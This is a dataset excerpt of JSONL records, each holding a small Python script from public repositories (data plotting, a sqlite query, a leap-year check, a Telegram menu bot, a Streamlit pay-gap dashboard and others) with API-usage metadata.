{"api_name": "decimal.Inexact", "line_number": 72, "usage_type": "attribute"}, {"api_name": "decimal.Rounded", "line_number": 73, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 74, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 94, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 95, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 116, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 118, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.date.fromtimestamp", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 135, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.date.fromtimestamp", "line_number": 137, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 137, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 137, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 157, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "4160611138", "text": "import csv\nfrom fileinput import filename\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nfilename = 'Chapter16/csv/Chicago.csv' #assign the csv file to filename\nwith open(filename) as file: #we assign the object of filename to file\n reader = csv.reader(file) #we call csv.reader and pass it the file object as an argument to create a reader oobject\n header_row = next(reader) #Store data from the first row with next function\n print(header_row)\n\n for index, column_header in enumerate(header_row): #Use this for loop/enumerate to find the indeces of date and temp min. (4,6)\n print(index, column_header)\n \n dates, highs, lows = [], [], [] # create a list\n for row in reader: # find the rows in reader\n if row[5] == '': # if the values in it are blank\n blank = (row[5]) #assign them to a variable that doesn't matter\n elif row[6] == '':\n blank = (row[6])\n else:\n low = int(row[6])\n lows.append(low)\n high = int(row[5]) #change the string to an int if its not blank and assign to variable high\n highs.append(high) #add the aformentioned variable to the list\n \n for row in reader:\n current_date = datetime.strptime(row[4], '%Y-%m-%d')\n dates.append(current_date)\n for i in dates:\n print(i) # I cannot figure out why this doesnt work sadly.\n print(highs) #print them to make sure they work (they do, just numbers now)\n print(lows)\n print(len(highs)) # find the number of values in the list (599, or roughly )\n\n\n\n\n #plotting the high temperatures\n plt.style.use('seaborn')\n fig, ax = plt.subplots()\n ax.plot(highs, c='orange')\n ax.plot(lows, c='blue')\n\n #Format plot\n ax.set_title(\"Daily high and low Temperatures, Chicago, 2022\", fontsize = 24)\n ax.set_xlabel('', fontsize =16)\n ax.set_ylabel(\"Temperature (F)\", fontsize = 16)\n ax.tick_params(axis = \"both\", which= \"major\", labelsize=16)\n\n plt.show()\n\n\n", "repo_name": "RiggityRussell/CIT228", "sub_path": "Chapter16/chicago_csv.py", "file_name": "chicago_csv.py", "file_ext": "py", "file_size_in_byte": 2007, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fileinput.filename", "line_number": 6, "usage_type": "name"}, {"api_name": "fileinput.filename", "line_number": 7, "usage_type": "argument"}, {"api_name": "csv.reader", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "9582120465", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 23 12:38:50 2019\n\n@author: michaelboles\n\"\"\"\n\n# set up working directory\nimport os\nos.chdir('/Users/michaelboles/Michael/Coding/2019/Realestate') # Mac\n#os.chdir('C:\\\\Users\\\\bolesmi\\\\Lam\\\\Coding\\\\Python\\\\2019\\\\Realestate') # PC\n\n# import data\nimport pandas as pd\ndata = pd.read_csv('./Data/listings/data_all_price_predictions.csv')\n\n# remind myself what the column names are\ndata.columns\n\n# create in-memory sqlite database, add dataframe\nfrom sqlalchemy import create_engine\nengine = create_engine('sqlite://', echo = False)\ndata.to_sql('Realestate', con=engine)\n\n# query database\nengine.execute(\"SELECT * FROM Realestate\").fetchall() # gets everything\nengine.execute('SELECT * FROM Realestate WHERE Zip = 94618').fetchall() # matches a zipcode\n\n# create a list from sql query \n# returns list of rowproxy objects, omits column names - why is this so hard\nrockridge = engine.execute('SELECT * FROM Realestate WHERE Zip = 94618').fetchall() # matches a zipcode\n", "repo_name": "mboles01/Realestate", "sub_path": "Old/SQL/sqlite.py", "file_name": "sqlite.py", "file_ext": "py", "file_size_in_byte": 1029, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "37541203182", "text": "print('='*6, 'ANO BISSEXTO', '='*6)\nprint('')\nfrom datetime import date # Biblioteca para capturar o ano atual do sistema.\na = int(input(\"Qual ano quer analisar? Ou digite 0 para o ano atual: \"))\n# Se o ano for divisível por 4 e tiver resto igual 0,\n# ou divisível por 100 tiver resto diferente de 0,\n# ou divisível por 400 tiver resto igual a 0.\nif a == 0:\n a = date.today().year # Para capturar o ano atual com o usuário digitando 0.\nif a % 4 == 0 and a % 100 != 0 or a % 400 == 0:\n print('O Ano {} é BISSEXTO.'.format(a))\nelse:\n print('O Ano {} NÃO é BISSEXTO.'.format(a))\n\n\n\n", "repo_name": "Edcarlos-Oliveira/PythonMundo1", "sub_path": "des032AnoBi.py", "file_name": "des032AnoBi.py", "file_ext": "py", "file_size_in_byte": 595, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.date.today", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "73708577794", "text": "#!/usr/bin/env python3\n\nimport argparse, re, os\nimport kmertools as kt\t\t#Available at https://github.com/jtladner/Modules\nimport fastatools as ft\t\t#Available at https://github.com/jtladner/Modules\nimport inout as io\t\t#Available at https://github.com/jtladner/Modules\nimport pandas as pd\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\ntypeface='Arial'\n\n\n#Example command: coverage_per_seq_violinplot.py -d /Users/colleenung/Documents/197911_InfluenzavirusA/HA/SW_SC_noC/t0.200/197911_id_70_9_SWSC-x9-y30-t0.200.fasta -c /Users/colleenung/Documents/197911_InfluenzavirusA/HA/197911_id_70_9 -k 9 -t 0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,0.95 --swCtoS -o 197911_id_70_9_coverage_per_seq_violinplot.png -s 197911_id_70_9_coverage_per_seq_stats.txt\n\nparser = argparse.ArgumentParser(description='''A script that will generate violin plot(s) to visualize the distribution of kmer coverage \n\t\t\t\t\t\tin the design on a per sequence basis. Can generate multiple violin plots, with each representing a different Xmer \n\t\t\t\t\t\tthreshold.''')\n\nparser.add_argument(\"-d\", \"--design\", metavar='\\b', help=\"Input design file. If looking at multiple Xmer thresholds, only provide path to one of the design files. Assuming designs share the same naming structure and are located in a directory containing subdirectories for each Xmer target threshold.\")\nparser.add_argument(\"-c\", \"--cluster\", metavar='\\b', help=\"Input cluster file to look at kmer coverage on a per sequence basis. Note, cluster names must end with cluster number.\")\n\nparser.add_argument(\"-k\", \"--ksize\", default=9, type=int, metavar='\\b', help=\"Size of kmer to use for looking at kmer coverage in the design [default: 9].\")\nparser.add_argument(\"-t\", \"--targets\", default=\"0.5,0.75,1\", metavar='\\b', help=\"Target thresholds to generate violin plots for. [default: 0.5,0.75,1]\")\nparser.add_argument(\"-o\", \"--output\", default=\"coverage_per_seq_violinplot.png\", metavar='\\b', help=\"Name of output PNG file with violin plot(s). [default: coverage_per_seq_violinplot.png]\")\nparser.add_argument(\"-s\", \"--statsoutput\", default=\"coverage_per_seq_violinplot.txt\", metavar='\\b', help=\"Name of output txt file with descriptive statistics. [default: coverage_per_seq_violinplot.txt]\")\nparser.add_argument(\"--swCtoS\", default=False, action=\"store_true\", help=\"Use this flag if Cysteine residues were converted to Serine residues in the SW portion of the design.\")\nparser.add_argument(\"-b\", \"--batchMode\", default=None, metavar='\\b', help=\"You can use this flag to run the script in batch mode. If used, it should be followed by the path to a tsv file with two columns and one row per design. The first column should correspond to --design and the second to --cluster. In this mode, the output filenames will be generated based on the input file names. [default: None]\")\n\n#New argument group to underscore that these arguments are required despite being provided with flags\n#reqArgs = parser.add_argument_group(\"required arguments\")\n\nargs = parser.parse_args()\n\n\n#Parsing target thresholds\ntargetThresh = sorted(list(set([float(x) for x in args.targets.split(\",\")])))\n\n#Prep for batch mode\nif args.batchMode:\n\tinputD = io.fileDict(args.batchMode, header=False)\nelse:\n\tinputD = {args.design:args.cluster}\n\n# Step through each design/cluster pair\nfor design, cluster in inputD.items():\n\t\n\t# Specify output names if running in batch mode\n\tif args.batchMode:\n\t\targs.output = \"%s_%s_vp.png\" % (os.path.basename(cluster), args.targets)\n\t\targs.statsoutput = \"%s_%s_vpStats.tsv\" % (os.path.basename(cluster), args.targets)\n\t\n\t#Reading in fasta file (in this case, cluster file). Returns two lists, the first containing seq names and the second containing its sequences.\n\tnames, seqs = ft.read_fasta_lists(cluster)\n\n\txthrList=[]\n\tcoverageperseqList=[]\n\tfor thr in targetThresh:\n\t\t#Using path of input design file to find design files for other desired target threshold(s), if applicable\n\t\tsearchstr= \".*/t([\\d.]*)/.*\"\n\t\tregexresult= re.search(searchstr, design)\n\t\tdesignPath= re.sub(str(regexresult.group(1)), (\"%.3f\" % (thr)), design)\n\n\t\t#Creating set of all unique kmers within design\n\t\tdesignkSet= kt.kmerSetFasta(designPath, args.ksize, filter=[])\n\n\t\tfor s in seqs:\n\t\t\tif args.swCtoS:\n\t\t\t\ts = s.replace(\"C\", \"S\")\n\t\t\t#Creating set of all unique kmers within sequence\n\t\t\tsSet = kt.kmerSet(s, args.ksize, filter=[\"X\"])\n\t\t\tif len(sSet)>0:\n\t\t\t\txmersCovered= sSet.intersection(designkSet)\n\t\t\t\tpercentCovered= (len(xmersCovered) / len(sSet))*100\n\t\t\t\txthrList.append((\"%.3f\" % (thr)))\n\t\t\t\tcoverageperseqList.append(percentCovered)\n\n\tlabelY= \"%% %dmers covered per sequence\" % args.ksize\n\tdataDict= {\"Xmer Threshold\":xthrList, labelY:coverageperseqList}\n\t#Creating pandas dataframe from dictionary\n\tdf = pd.DataFrame(dataDict)\n\n\n\t#Generating violin plot from pandas dataframe using Seaborn\n\tfig, ax = plt.subplots(1,1,figsize=(10,10),facecolor='w')\n\tsns.violinplot(x=df[\"Xmer Threshold\"], y=df[labelY], palette=\"Set3\", ax=ax)\n\tax.set_ylabel(labelY)\n\tax.set_ylim(0,100)\n\tax.set_xlabel(\"Xmer Threshold\")\n\tfig.savefig(args.output, bbox_inches='tight', dpi=200)\n\tplt.close(fig=fig)\n\n\n\t#Writing out file with descriptive statistics\n\twith open(args.statsoutput, \"w\") as fout:\n\t\tline1= \"\\tMaximum\\tQ3\\tMedian\\tQ1\\tMinimum\\tIQR\"\n\t\tfout.write(line1)\n\t\n\t\tfor thr in targetThresh:\n\t\t\tthrDF= df.loc[df[\"Xmer Threshold\"] == (\"%.3f\" % (thr))]\n\t\t\n\t\t\tmaximum= thrDF[labelY].max()\n\t\t\tq3= thrDF[labelY].quantile(q=0.75, interpolation='midpoint')\n\t\t\tmedian= thrDF[labelY].quantile(q=0.5, interpolation='midpoint')\n\t\t\tq1= thrDF[labelY].quantile(q=0.25, interpolation='midpoint')\n\t\t\tminimum= thrDF[labelY].min()\n\t\t\tIQR= q3-q1\n\t\t\n\t\tline2= \"\\n%.3f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\" % (thr,maximum,q3,median,q1,minimum,IQR)\n\t\tfout.write(line2)", "repo_name": "LadnerLab/Library-Design", "sub_path": "extensions/coverage_per_seq_violinplot.py", "file_name": "coverage_per_seq_violinplot.py", "file_ext": "py", "file_size_in_byte": 5732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "inout.fileDict", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "fastatools.read_fasta_lists", "line_number": 54, "usage_type": "call"}, {"api_name": "re.search", "line_number": 61, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 62, "usage_type": "call"}, {"api_name": "kmertools.kmerSetFasta", "line_number": 65, "usage_type": "call"}, {"api_name": "kmertools.kmerSet", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "seaborn.violinplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}]} +{"seq_id": "16943469616", "text": "from django.contrib.auth.models import AnonymousUser\n\nfrom .models import User\n\nclass DummyAuthBackend:\n \"\"\" \"\"\"\n\ndef get_user(get_response):\n def middleware(request):\n email = request.headers.get('user')\n if email:\n request.user = User.objects.filter(email=email).first()\n if request.user is None:\n raise ValueError(\"User not found\")\n else:\n request.user = AnonymousUser()\n\n return get_response(request)\n\n return middleware\n", "repo_name": "osohq/oso-django-integration", "sub_path": "oso_tutorial/expenses/authorization.py", "file_name": "authorization.py", "file_ext": "py", "file_size_in_byte": 510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.User.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "74348435395", "text": "import numpy as np\nfrom matplotlib import pyplot as plt\nimport librosa\n\nfrom postprocess_utils import seg_metrics\nfrom utils import extract_features_melspec\n\naudio_filename = \"./samples/seg-test16.wav\"\nfeatures_filename = \"./samples/seg-test_features.npy\"\n# predictions_filename = \"samples/predictions_2018-05-24_17-48.npy\"\n\naudio, sr = librosa.load(audio_filename, sr=16000)\n# predictions = np.load(predictions_filename)\n# features = np.load(features_filename)\nfeatures = extract_features_melspec(audio, sr)\n\nprint(\"AUDIO\", audio.shape)\n# print(\"PREDICTIONS\", predictions.shape)\nprint(\"FEATURES\", features.shape)\n\ntimeseries_length = 100\nhop_length = 25\n\n# preds = deoverlap_predictions(predictions, features, hop_length)\n# norm_preds = defragment_vad(preds)\n\n# reference = [(6.42, 6.85), (13.49, 13.78)]\nreference = [(0, 6.42), (6.42, 13.49), (13.49, 20.43)]\n\n# lium = [(13.55, 13.67)]\nlium = [(0, 13.55), (13.55, 20.43)]\n\nref_plot = [0.1 for _ in range(len(audio))]\nfor r in reference:\n sr = 16000\n (start, end) = librosa.core.time_to_samples(r, sr=sr)\n start = max((0, start))\n end = min((len(audio), end))\n print(\"REF\", start, end)\n ref_plot[start:end] = [0.9 for _ in range(end - start)]\nprint(len(ref_plot))\n\n\nlium_seg = [0 for _ in range(len(audio))]\nfor l in lium:\n sr = 16000\n (start, end) = librosa.core.time_to_samples(l, sr=sr)\n start = max((0, start))\n end = min((len(audio), end))\n print(\"LIUM\", start, end)\n lium_seg[start:end] = [1 for _ in range(end - start)]\nprint(len(lium_seg))\n\nseg_metrics(lium, reference)\n\nfig, (\n (ax1),\n (ax2),\n # (ax3)\n) = plt.subplots(2, 1)\n\nax1.plot(audio)\nax1.set_title('skaņas līkne', fontsize='large')\n\nax2.plot(lium_seg)\nax2.plot(ref_plot)\nax2.set_title('LIUM rezultāti', fontsize='large')\n\n# ax3.plot(norm_preds)\n# ax3.plot(ref_plot)\n# ax3.set_title('normalizēti rezultāti', fontsize='large')\n\nplt.show()\n\n\n\n", "repo_name": "dmednis/speaker-segmenter", "sub_path": "test_seg.py", "file_name": "test_seg.py", "file_ext": "py", "file_size_in_byte": 1908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "librosa.load", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.extract_features_melspec", "line_number": 15, "usage_type": "call"}, {"api_name": "librosa.core.time_to_samples", "line_number": 36, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 36, "usage_type": "attribute"}, {"api_name": "librosa.core.time_to_samples", "line_number": 47, "usage_type": "call"}, {"api_name": "librosa.core", "line_number": 47, "usage_type": "attribute"}, {"api_name": "postprocess_utils.seg_metrics", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "5406651356", "text": "from django.shortcuts import render\nfrom pymongo import MongoClient\nfrom models import *\n\n# Create your views here.\n\ndef saveRoute():\n client = MongoClient(\"localhost\", 27017)\n db = client.scrapping\n cursor = db.route_data.find()\n for each in cursor:\n r = RouteData(\n depTimeString=str(each.get('depTimeString')),\n maxUpperColumns=str(each.get('maxUpperColumns')),\n fromCity=str(each.get('FromCity')),\n maxLowerColumns=str(each.get('maxLowerColumns')),\n maxLowerRows=str(each.get('maxLowerRows')),\n DPInformationList=each.get('DPInformationList'),\n toCity=str(each.get('ToCity')),\n maxUpperRows=str(each.get('maxUpperRows')),\n vehicleType=str(each.get('vehicleType')),\n BPInformationList=each.get('BPInformationList'),\n travelDate=str(each.get('travelDate')),\n busType=str(each.get('busType')),\n MPax=str(each.get('MPax')),\n serviceName=str(each.get('serviceName')),\n seatList=str(each.get('seatlist')),\n toCityId=str(each.get('ToCityId')),\n operatorId=str(each.get('operatorId')),\n amenities=str(each.get('amenties')),\n notes=str(each.get('Notes')),\n dateOFJourney=str(each.get('DateOfJourney')),\n routeId=str(each.get('RouteId')),\n travels=str(each.get('Travels')),\n arrTime=str(each.get('arrTime')),\n arrTimeString=str(each.get('arrTimeString')),\n serviceNumber=str(each.get('serviceNo')),\n aes=str(each.get('aes')),\n mxSPrTxn=str(each.get('mxSPrTxn')),\n depTime=str(each.get('depTime')),\n isBPMapLinkShown=str(each.get('isBPMapLinkShown')),\n fromCityId=str(each.get('FromCityId')),\n param42=each.get('param42')\n )\n r.save()\n # break\n\n\ndef saveTrip():\n client = MongoClient(\"localhost\", 27017)\n db = client.scrapping\n cursor = db.trip.find()\n\n for each in cursor:\n data = each.get('data')\n t = TripData(\n status=str(each.get('status')),\n defaultSorting=each.get('DefaultSorting'),\n amenitiesData=str(each.get('amenitiesData')),\n message=str(each.get('message'))\n )\n t.save()\n try:\n for singleData in data:\n try:\n tsd = TripSingleData(\n tripData=t,\n DPList=singleData.get('DPLst'),\n vt=str(singleData.get('vt')),\n busType=str(singleData.get('BsTp')),\n Tips=str(singleData.get('Tips')),\n BsSvid=str(singleData.get('BsSvId')),\n Sort=str(singleData.get('Sort')),\n IsDPA=str(singleData.get('IsDPA')),\n NSA=str(singleData.get('NSA')),\n params42=singleData.get('param42'),\n serviceName=str(singleData.get('serviceName')),\n giry=str(singleData.get('Glry')),\n RbPrefCode=str(singleData.get('RbPrefCode')),\n WnSt=str(singleData.get('WnSt')),\n DpTm=str(singleData.get('DpTm')),\n IsAC=str(singleData.get('IsAc')),\n IsNAc=str(singleData.get('IsNAc')),\n RtId=str(singleData.get('RtId')),\n IsSpF=str(singleData.get('IsSpF')),\n IsSlpr=str(singleData.get('IsSlpr')),\n serviceId=str(singleData.get('serviceId')),\n FareList=singleData.get('FrLst'),\n Ament=singleData.get('Ament'),\n OpId=str(singleData.get('OpId')),\n BPList=singleData.get('BPLst'),\n IsMTE=str(singleData.get('IsMTE')),\n Rtg=singleData.get('Rtg'),\n IsBpDpSearch=str(singleData.get('IsBpDpSearch')),\n jDur=str(singleData.get('jDur')),\n isStr=str(singleData.get('IsStr')),\n Tvs=str(singleData.get('Tvs')),\n Cmpg=singleData.get('Cmpg'),\n BsSt=str(singleData.get('BsSt')),\n ArTm=str(singleData.get('ArTm'))\n )\n tsd.save()\n except:\n pass\n except:\n pass\n # break\n # break\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "ankittube/dbtransfer", "sub_path": "transferdb/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "40037380553", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport logging\nimport telegram\nfrom mensa import fetch_all_menus, overwrite_current_menus\nfrom time import sleep\nimport sys\nfrom datetime import datetime\nfrom config import Config\nfrom utils import format_menus\nimport asyncio\n\n\nasync def send_menus(bot, config):\n \"\"\"Run the bot.\"\"\"\n date = datetime.today()\n overwrite_current_menus(config)\n mensa_menus = fetch_all_menus(config, date)\n users_mensas = config.get_database().get_all_user_and_mensas()\n print(\"Sending menus in %d messages\" % (len(users_mensas)))\n for cid, mensa in users_mensas:\n menus = mensa_menus[mensa]\n if not menus:\n continue\n await send_message(bot, cid, format_menus(mensa, menus, date))\n\n\nasync def send_message_to_all(bot, users, msg):\n print(\"Sending message to all %d users\" % len(users))\n for cid in users:\n await send_message(bot, cid, msg)\n\n\nasync def send_message(bot, chat_id, message):\n try:\n await bot.send_message(chat_id=chat_id, text=message,\n parse_mode='HTML')\n except Exception as ex:\n print(\"Could not send message to\", chat_id, str(ex))\n sleep(0.05) # avoiding flood limits\n\n\nasync def main():\n if len(sys.argv) == 1:\n print(f\"Usage: python3 {__file__} [message to all]\")\n sys.exit()\n config = Config(sys.argv[1])\n bot = telegram.Bot(config.get_token())\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - '\n '%(message)s')\n async with bot:\n if len(sys.argv) > 2:\n await send_message_to_all(bot, config.get_database().get_users(),\n \" \".join(sys.argv[2:]))\n else:\n await send_menus(bot, config)\n\nif __name__ == '__main__':\n asyncio.run(main())\n", "repo_name": "dnrhead/mensa_bot", "sub_path": "Bot/send_messages.py", "file_name": "send_messages.py", "file_ext": "py", "file_size_in_byte": 1861, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.today", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 16, "usage_type": "name"}, {"api_name": "mensa.overwrite_current_menus", "line_number": 17, "usage_type": "call"}, {"api_name": "mensa.fetch_all_menus", "line_number": 18, "usage_type": "call"}, {"api_name": "config.get_database", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.format_menus", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "config.Config", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "telegram.Bot", "line_number": 48, "usage_type": "call"}, {"api_name": "config.get_token", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "config.get_database", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "asyncio.run", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "4710100071", "text": "import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\nyears = list(range(1985, 2011))\n\nst.title('Gender Pay Gap')\nst.subheader('Data Analytics Project')\n\nst.cache_data()\ndef load_dataset():\n df=pd.read_csv(\"cleaned_gpg_v2.csv\", usecols=['year','region','relate','sex','race','marst','occ','ind','classwkr',\n 'hrswork','incwage','annhrs','hrwage','inflate','expendbase10','perconexp',\n 'potexp','potexp2','o_occ1990','o_occ1950','o_ind1950','o_ind1990'] )\n df.set_index('year',inplace=True)\n return df\n\nwith st.spinner('Loading data...'):\n df = load_dataset()\n\n\nyears = df.index.unique().tolist()\nselectyear = st.sidebar.selectbox('Select a year', years)\nst.info(f'You selected {selectyear}')\n\nst.write(df.shape)\nr = df.race.unique().tolist()\ns = df.sex.unique().tolist()\noccupation = df.occ.unique().tolist()\nindustry = df.ind.unique().tolist()\n\nrace = st.sidebar.selectbox('select a race', r )\nsex = st.sidebar.selectbox('select a sex', s )\noccup = st.sidebar.selectbox('select a occupation', occupation )\nindus = st.sidebar.selectbox('select a industry', industry )\n\nif st.sidebar.checkbox('Show raw data'):\n st.dataframe(df[(df['race']== race) & (df['sex'] == sex)][:1000])\n st.dataframe(df[(df['occ']== occup) & (df['ind'] == indus)][:1000])\n\ndf_year = df[df.index == selectyear]\n\nfig1 = px.area(x=df.index, y=df['incwage'], title=f'INCOME WAGE')\nfig2 = px.scatter( x=df.index, y=df['occ'], title=f'OCCUPATION')\nfig3 = px.bar(x=df.index, y=df['ind'], title=f'INDUSTRY')\nfig4 = px.box(x=df.index, y=df['hrswork'], title=f'HOURS WORKED')\nif st.checkbox('Show income wage'):\n st.plotly_chart(fig1, use_container_width=True)\nif st.checkbox('Show occupation'):\n st.plotly_chart(fig2, use_container_width=True)\nif st.checkbox('Show industry'):\n st.plotly_chart(fig3, use_container_width=True)\nif st.checkbox('Show hours worked'):\n st.plotly_chart(fig4, use_container_width=True)\n\nfig5 = px.scatter(df, x=\"incwage\", y=\"hrswork\", color=\"sex\", marginal_y=\"violin\", title=f'INCOME WAGE VS HOURS WORKED')\nif st.checkbox('Show income wage vs hours worked'):\n st.plotly_chart(fig5, use_container_width=True)\n\nif st.checkbox('Show group analysis'):\n fig7 = px.sunburst(df, path=['classwkr','sex'], values='incwage', title=f'CLASS OF WORKERS AND THEIR INCOME WAGE')\n st.plotly_chart(fig7, use_container_width=True)\n fig11 = px.sunburst(df,path=['marst','sex'],values='annhrs',title=f'MARITAL STATUS AND NO.OF HOURS WORKED')\n st.plotly_chart(fig11, use_container_width=True)\n fig14 = px.treemap(df,names=[''])\nfig8 = px.bar(df, x=\"incwage\", y=\"expendbase10\", color=\"sex\", title=f'INCOME WAGE VS EXPENDITURE')\nif st.checkbox('Show income wage vs expenditure'):\n st.plotly_chart(fig8, use_container_width=True)\nfig9 = px.histogram(df,x=\"o_occ1990\",y=\"sex\",title=f'OCCUPATION IN 1990')\nfig10 = px.histogram(df,x='o_occ1950',y='sex',title=f'OCCUPATION IN 1950')\nif st.checkbox('Show difference in occupation'):\n st.plotly_chart(fig9, use_container_width=True)\n st.plotly_chart(fig10, use_container_width=True)\nfig12 = px.violin(df,x='hrswork',y='incwage',title=f'INCOME WAGE VS HOURS WORKED')\nfig13 = px.violin(df,x='annhrs',y='hrwage',title=f'HOURLY WAGE VS NO.OF HOURS WORKED')\nif st.checkbox('Show comparison between income wage and hours wage'):\n st.plotly_chart(fig12, use_container_width=True)\n st.plotly_chart(fig13, use_container_width=True)\n", "repo_name": "Pranshirastogi/Data-analytics-python-course-", "sub_path": "major project/work/dap.py", "file_name": "dap.py", "file_ext": "py", "file_size_in_byte": 3575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.title", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 11, "usage_type": "call"}, {"api_name": "streamlit.cache_data", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.spinner", "line_number": 21, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 26, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 26, "usage_type": "attribute"}, {"api_name": "streamlit.info", "line_number": 27, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 29, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 35, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 35, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 36, "usage_type": "call"}, {"api_name": 